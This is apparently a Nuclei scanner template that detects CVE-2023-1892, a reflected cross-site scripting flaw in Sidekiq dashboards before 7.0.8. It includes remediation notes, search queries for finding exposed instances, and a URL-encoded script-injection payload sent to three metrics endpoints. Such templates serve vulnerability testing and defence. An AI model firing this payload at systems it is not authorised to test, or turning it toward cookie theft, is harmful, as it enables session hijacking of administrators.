id: CVE-2023-1892 info: name: Sidekiq < 7.0.8 - Cross-Site Scripting author: ritikchaddha,princechaddha severity: critical description: | An XSS vulnerability on a Sidekiq admin panel can pose serious risks to the security and functionality of the system. impact: | Unauthenticated attackers can inject malicious JavaScript through the period parameter in Sidekiq metrics endpoints, potentially stealing administrator session cookies and accessing sensitive job queue information and worker statistics. remediation: | Update Sidekiq to version 7.0.8 or later that properly sanitizes the period parameter and encodes output in the metrics dashboard. reference: - https://huntr.com/bounties/e35e5653-c429-4fb8-94a3-cbc123ae4777 - https://github.com/sidekiq/sidekiq/commit/458fdf74176a9881478c48dc5cf0269107b22214 - https://nvd.nist.gov/vuln/detail/CVE-2023-1892 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H cvss-score: 9.6 cve-id: CVE-2023-1892 cwe-id: CWE-79 epss-score: 0.02742 epss-percentile: 0.84185 cpe: cpe:2.3:a:contribsys:sidekiq:*:*:*:*:*:*:*:* metadata: max-request: 4 vendor: contribsys product: sidekiq shodan-query: http.title:"sidekiq" fofa-query: - title="Sidekiq" - title="sidekiq" google-query: intitle:"sidekiq" tags: cve,cve2023,sidekiq,contribsys,xss,vuln flow: http(1) && http(2) http: - method: GET path: - "{{BaseURL}}/queues" matchers: - type: word internal: true part: body words: - "Sidekiq" - "Dashboard" condition: and - method: GET path: - "{{BaseURL}}/metrics?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E" - "{{BaseURL}}/metrics/SanityChecksJob?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E" - "{{BaseURL}}/metrics/ActiveStorage::PurgeJob?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E" stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - "" - type: word part: header words: - 'text/html' - type: status status: - 200 # digest: 4a0a0047304502210089b663ed1a0f8e809d8ce789fa9e8cea759a3f23cd22944a902d88cf6b8cd2190220191ac19d2090befedebc8536e5b93d11d309c5a5ca310416f0ae15efe45a1b42:922c64590222798bb761d5b6d8e72950